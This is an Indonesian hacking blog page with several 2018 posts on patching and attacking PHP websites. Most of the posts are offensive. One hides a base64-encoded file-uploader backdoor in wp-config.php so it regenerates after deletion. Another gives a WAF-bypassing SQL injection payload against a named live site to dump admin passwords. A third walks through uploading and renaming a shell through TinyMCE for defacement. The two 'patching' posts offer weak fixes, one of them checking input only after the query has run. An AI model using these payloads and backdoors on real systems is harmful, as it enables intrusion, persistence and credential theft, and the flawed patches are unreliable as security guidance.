Tuesday, July 17, 2018

Menutup Bug SQL Injection

  No comments
July 17, 2018


Assalamualaikum Wr Wb

Kali ini Saya akan membahas cara menutup bug SQL Injection,SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi clientdengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.

Disini Saya Akan membahas cara menutup bug SQL Injection, Langsung Saja Ke Pembahasan

Sebagai contoh Saya disini memiliki Source Code yang vuln terhadap SQL Injection
Code nya sebagai berikut :




<?php 
$id = $_GET['id'];
$q = mysql_query("SELECT * FROM berita WHERE `url` = '".$id."' ") or die(mysql_error());
$row = mysql_fetch_array($q);
$qryUser = mysql_query("SELECT user FROM akses WHERE id_akses = '".$row['id_akses']."' ");
$rowUser = mysql_fetch_array($qryUser);
?>

Query SQL diatas vuln karena tidak ada filter sama sekali,sehingga kita  bisa menyisipkan perintah SQL.



Untuk Menangani Hal Tersebut,kita perlu memberi filter pada Query,dengan cara sebagai berikut :



1. Dengan Memberi Perintah is_numeric

Jadi Query SQL nya sebagai berikut :





<?php
$id = $_GET['id'];
$q = mysql_query("SELECT * FROM berita WHERE `url` = '".$id."' ") or die(mysql_error());
$row = mysql_fetch_array($q);
$qryUser = mysql_query("SELECT user FROM akses WHERE id_akses = '".$row['id_akses']."' ");
$rowUser = mysql_fetch_array($qryUser);
if(!is_numeric($id)){
header("location:index.php");
exit;
}
?>


Jadi jika perintah yang dimasukkan bukan numerik,maka akan redirect ke index.php



2. Menggunakan mysql_real_escape_string





$id = mysql_real_escape_string($_GET['id']);


Dengan begitu saat sang attacker mulai meng-inject target maka tidak ada error yang muncul







Sekian pembahasan kali ini,jika ada salah saya mohon maaf

wasalamualaim wr wb



Referensi :



- Simple patching bug SQL injection ~ LAmongan Xploiter

Cara Menutup Bug SQL Injection (SQLi) ~ abaykan

Read More

Patching Bug Bypass Admin

  No comments
July 17, 2018



Assalamualaikum Wr Wb



Kali Ini Saya Akan membahas bagaimana cara patching Bug "Bypass Admin",Disini saya memiliki Source Code Sederhana (Copas Dari CowoKerenTeam),



Berikut Source Code Nya:





<?php
mysql_connect(“localhost”,”root”,””) // koneksi ke database;
mysql_select_db(“contoh”) // pilih database;
$user=$_POST[‘user’] // user post;
$pass=md5($_POST[‘pass’]) // passpost;
$cek=mysql_query(“select * from admin where user=’$user’ AND pass=’$pass'”) // cek ke query;
$ketemu=mysql_num_rows($cek) //menghitung jumlah query yang di cek;
$r=mysql_fetch_array($cek) ;
if($ketemu>0){
session_start();
$_SESSION[‘admin’]=$r[‘user’];
header(“Location:.”);
}
else{
header(“Location:.”); } ?>

Copy Code Itu Lalu Pastekan di Notepad/Lainnya

Terlihat Diatas Masalah nya ada di



$user=$_POST[‘user’] // user post;
$pass=md5($_POST[‘pass’]) // passpost;
Dan Untuk Patching Nya Kita Perlu Membuat Functions,Disini Saya Membuat Function dengan nama
gagalinject
Dengan Script Sebagai Berikut :




function gagalinject($data){
$filter=mysql_real_escape_string(htmlspecialchars(stripslashes(strip_tags($data, ENT_QUOTES))));
return $filter;
}


Maka Source Code Lengkap Nya Adalah Seperti Ini :





<?php
mysql_connect(“localhost”,”root”,””);
mysql_select_db(“contoh”);
function gagalinject($data){$filter=mysql_real_escape_string(htmlspecialchars(stripslashes(strip_tags($data, ENT_QUOTES))));
return $filter;
}
$user=gagalinject($_POST[‘user’]);
$pass=gagalinject(md5($_POST[‘pass’]));
$cek=mysql_query(“select * from admin where user=’$user’ AND pass=’$pass'”);
$ketemu=mysql_num_rows($cek);$r=mysql_fetch_array($cek) ;
if($ketemu>0){
session_start();.
$_SESSION[‘admin’]=$r[‘user’];
header(“Location:.”);
}
else{
echo “Error”;
}
?>


Lalu Save Source Code Nya

Dan Coba Jalankan Source Code Itu



Sekian Tutorial Singkat Ini

Jika Ada salah mohon maaf

Wassalamualaikum Wr Wb



Source :
http://cowokerensteam.blogspot.com/2016/10/cara-patch-bug-bypass-admin.html
Patching Bug Bypass Admin - SPECIMENT ID

Read More

Thursday, July 12, 2018

Menyembunyikan Backdoor Dalam File Internal Website

  3 comments
July 12, 2018



Assalamu'alaikum Wr Wb

Kali ini Saya akan memberi tips agar SHELL BACKDOOR tidak terhapus oleh defacer - defacer idiot :v
Jadi Langsung Saja Kita Bahas Bagaimana Cara nya.

Source Code :



<?php
if (file_exists("images/upgrade.php")){
}else{
echo '<b>Backdoor Created ~></b> <a href="images/upgrade.php"/>upgrade.php</a>';
mkdir("images", 0777);
$img = fopen('images/upgrade.php', 'w');
$sec = base64_decode("PD9waHAKaWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpewokZmlsZWRpciA9ICIiOwokbWF4ZmlsZSA9ICcyMDAwMDAwJzsKCiR1c2VyZmlsZV9uYW1lID0gJF9GSUxFU1snaW1hZ2UnXVsnbmFtZSddOwokdXNlcmZpbGVfdG1wID0gJF9GSUxFU1snaW1hZ2UnXVsndG1wX25hbWUnXTsKaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsKJGFib2QgPSAkZmlsZWRpci4kdXNlcmZpbGVfbmFtZTsKQG1vdmVfdXBsb2FkZWRfZmlsZSgkdXNlcmZpbGVfdG1wLCAkYWJvZCk7CgplY2hvIjxjZW50ZXI+PGI+RG9uZSA9PT4gPGEgaHJlZj0nJHVzZXJmaWxlX25hbWUnIHRhcmdldD0nX2JsYW5rJz4kdXNlcmZpbGVfbmFtZTwvYT48L2I+PC9jZW50ZXI+IjsKfQp9CmVsc2V7CmVjaG8nPGNlbnRlcj4KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249IiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImltYWdlIj48aW5wdXQgdHlwZT0iU3VibWl0IiBuYW1lPSJTdWJtaXQiIHZhbHVlPSJTdWJtaXQiPjwvZm9ybT48L2NlbnRlcj4nOwp9Cj8+");
fwrite($img ,$sec);
fclose($img);
}
?>


Tips Ini Mengandalkan file internal website (file yang ada di websitemya) jadi lebih efektif.
Kenapa Harus File internal?
Karena Kita jdi mudah buat akses nya,contoh di cms Wordpress ada wp-config.php
Nah kita letakkan saja Code diatas di file wp-config.php nah nanti pas file kita yang di site.com/images/upgrade.php di hapus oleh seseorang jadi bisa muncul lagi.
Caranya tinggal Buka saja site.com/ <~ karena kita menaruh source code diatas di wp-config.php otomatis shell/uploader ter created lgi di folder /images/

Sekian Tutorial dari saya , kurang lebihnya mohon maaf
Wassalamualaikum wr wb

Read More

Sunday, July 8, 2018

Bypass 412 Precondition Failed SQL Injections

  No comments
July 08, 2018

WAF Bypass
Assalamualaikum Wr Wb

Kali Ini saya akan memberi tutorial bypass WAF 412 saat melakukan DIOS (SQL Injections)
Langsung saja tanpa basa basi

pertama :

Buka target yang mau di bypass 

  • Live Target : http://layangaero.com/?page=news_details&id=25

Order by dulu seperti biasa
lalu union select juga seperti biasa 
Nah pas mau masukin dios nanti ketemu sama Error 412 Precondition Failed


412 Precondition Failed


Mari Kita Bypass Waf Nya

Cara nya gampang ganti huruf F pada kata From di DIOS menjadi %66 (Hasil urlencode dari huruf F)

Contoh :

  • make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) 
Kita Ubah Menjadi

  • make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Lalu Masukan ke Magic Number Nya
Lalu Tekan Enter
Dan Lihat 



WAF nya sudah terbypass
Jika mau dump username dan password Bypass Lagi caranya 

Ubah Nama Tabel Dan Column Nya

Contoh :
  • make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Ubah Jadi
  • make_set(6,@:=0x0a,(select(1)%66rom(admin)where@:=make_set(511,@,0x3c6c693e,username,password)),@)
Maka Akan Keluar data yang ingin di dump

Sekian Dari Saya Kurang Lebih nya mohon maaf
Wassalamualaikum wr wb



Read More

Wednesday, June 6, 2018

Cara Decrypt Shell Yang DI Encrypt

  4 comments
June 06, 2018

Encrypted
Assalamualaikum Wr Wb
Kali ini w akan share cara decrypt shell,disini saya memakai PHP (Noob Kang)

Langsung Saja Kita Garap

Bahan :
1. Xampp / Shell (buka di xampp klo gk gitu upload ke hosting/web)
2. Notepad / Sublime Text dll.
3. Kopi

Source Code :



<?php
$isinya = "Source Yang Ke Encrypt Taro sini";
$img = fopen('hasil.txt', 'w');
$decode = gzuncompress(strrev(base64_decode(strrev(str_rot13($isinya)))));
fwrite($img ,$decode);
fclose($img);
?>


Step :
1. Buka Shell yang ke encrypt pake notepad atau yang lain
2. Copy Source Code Diatas
3. Pastekan Di Notepad
4. Pastekan SC shell yg ter encrypt di

$isinya = "DISINI";

5. Sesuaikan Alur Encrypt Nya (variabel $decode)
6. Save pake extensi .php
7. Upload Ke Web
8. Buka File Nya
9. Hasil Nya Ada di file hasil.txt

Read More

Monday, June 4, 2018

TinyMce Image Manager

  No comments
June 04, 2018


TinyMce
Assalamualaikum Wr Wb
Ketemu Lagi Sama Cimeng :v eh Speciment :v
kali ini w bakal kasih tutor depes Tinymce Image Manager
Langsung Saja Tanpa Basa Basi

Bahan :
Dork : inurl:/tinymce/plugins/image/uploads/
Exploit : /tinymce/plugins/image/image.php
Shell Extensi .jpg (rename Shell.php jadi shell .php)

POC:

1. Dorking Dulu Pake Dork Di atas,Terus Pilih 1 Target nya

Kembangkan Lagi Ya :)
2. Masukkan Exploit nya

contoh : site.com/tinymce/plugins/image/image.php
nanti tampilan nya kek gini
TinyMce
 Abis Gitu Klik Upload Now

3. Upload Shell.jpg

Upload Shell Nya
4. Nah Sekarang Kita Rename Shell.jpg jadi shell.php
cara nya :

ganti image.php jadi :
rename_file.php?current_name=shell.jpg&new_name=shell.php

Lalu Enter
Maka Tampilannya Akan Seperti Ini

Sukses Rename File

5. Akses Shell Nya

site.com/tinymce/plugins/image/uploads/shell.php

Happy Deface :)
Sekian Dari Cimeng
wassalamualaikum wr wb

Read More

Sunday, June 3, 2018

Install Weevely On Windows

  No comments
June 03, 2018

Weevely


Assalamualaikum Wr Wb

Kali Ini Saya Akan Memberikan Tutor Install Weevely Di Windows
Weevely Digunakan untuk backconnect,apabila gagal menggunakan ngrok bisa menggunakan weevely

Langsung saja
Download dulu :




1. Install Python Dan pyreadline2.1 nya dlu ( Download Terus Install Kek Aplikasi Biasa)
2. Download Weevely Nya Lalu Extract
3. Pindahkan Ke C:\Python27\weevely\
4. Buka CMD lalu arahkan ke C:\Python27\weevely\
5. Ketik main.py
Tampilan Nya
6. Jika Muncul Seperti Itu Berarti Weevely Sudah Ter Install


Untuk Rooting Nanti Di Postingan Selanjut nya :v
Sekian Kurang Lebih Nya Mohon Maaf :)
Wasalammualaikum Wr Wb

Read More